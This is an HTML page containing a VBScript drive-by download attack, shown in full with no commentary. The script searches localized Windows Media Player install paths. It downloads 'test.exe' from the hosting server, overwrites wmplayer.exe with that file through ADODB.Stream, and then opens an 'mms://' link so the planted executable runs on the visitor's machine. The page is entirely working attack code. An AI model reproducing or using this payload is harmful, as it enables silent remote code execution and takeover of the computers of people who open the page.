<HTML>
<Script Language='VBS'>
On Error Resume Next

wmp=Array(":\Programmer\Windows Media Player\wmplayer.exe", _
         ":\Programmer\Windows Media Player\mplayer2.exe", _
         ":\Program\Windows Media Player\wmplayer.exe", _
         ":\Program\Windows Media Player\mplayer2.exe", _
         ":\Programme\Windows Media Player\wmplayer.exe", _
         ":\Programme\Windows Media Player\mplayer2.exe", _
         ":\Programmi\Windows Media Player\wmplayer.exe", _
         ":\Programmi\Windows Media Player\mplayer2.exe", _
         ":\Programfiler\Windows Media Player\wmplayer.exe", _
         ":\Programfiler\Windows Media Player\mplayer2.exe", _
         ":\Programas\Windows Media Player\wmplayer.exe", _
         ":\Programas\Windows Media Player\mplayer2.exe", _
         ":\Archivos de programa\Windows Media Player\wmplayer.exe", _
         ":\Archivos de programa\Windows Media Player\mplayer2.exe", _
         ":\Program Files\Windows Media Player\wmplayer.exe", _
         ":\Program Files\Windows Media Player\mplayer2.exe")

cdp=Array("C","D","E")

For w=0 to Ubound(cdp)
 For i=0 to Ubound(wmp)
 If ExFile(cdp(w)&wmp(i)) Then wmpath = cdp(w)&wmp(i): Exit For
 Next
If Not(IsEmpty(wmpath)) Then Exit For
Next

 Set xml = CreateObject("Microsoft.XMLHTTP")

 Set ads = CreateObject("ADODB.Stream")

 gUrl = LCase(document.url)
 gUrl = Mid(gUrl,InStr(gUrl,"http"),InStrRev(gUrl,"//")-InStr(gUrl,"http")) & "/test.exe"

 xml.Open "GET", gUrl, False
 xml.Send

 ads.Mode = 3
 ads.Type = 1
 ads.Open
 ads.Write(xml.ResponseBody)
 ads.SaveToFile wmpath, 2

 location.href = "mms://"

Function ExFile(path)
On Error Resume Next
LoadPicture(path)
ExFile = Err.Number = 481
End Function

</Script>
</HTML>